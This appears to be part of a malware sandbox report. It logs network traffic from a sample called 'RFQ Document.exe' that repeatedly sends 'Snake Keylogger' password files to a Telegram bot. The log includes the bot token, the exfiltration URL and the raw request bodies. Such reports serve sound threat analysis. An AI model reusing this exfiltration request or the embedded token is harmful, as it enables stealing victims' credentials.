                                            2021-09-28 05:58:36 UTC112OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 37 39 62 63 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb79bc6fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC112INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC113INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12652,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            71192.168.2.449847149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC113OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb9659fd
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC113OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 39 36 35 39 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb9659fdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:37 UTC114INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:37 UTC114INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12653,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            72192.168.2.449848149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC115OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cbae3072
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC115OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 61 65 33 30 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cbae3072Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:37 UTC115INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:37 UTC116INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12654,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            73192.168.2.449849149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC116OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cbdb7cb6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC117OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 64 62 37 63 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cbdb7cb6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:37 UTC117INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:37 UTC117INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12655,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            74192.168.2.449850149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC118OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cbf3540f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC118OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 66 33 35 34 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cbf3540fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:37 UTC119INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:37 UTC119INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12657,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            75192.168.2.449851149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC120OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc08cab5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC120OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 30 38 63 61 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc08cab5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:37 UTC120INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:37 UTC121INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12658,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808717,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            76192.168.2.449852149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:37 UTC121OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc20a359
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:37 UTC121OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 32 30 61 33 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cc20a359Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:38 UTC122INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:38 UTC122INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12659,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            77192.168.2.449853149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:38 UTC123OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cc403d3d
                                            Host: api.telegram.org
                                            Content-Length: 407
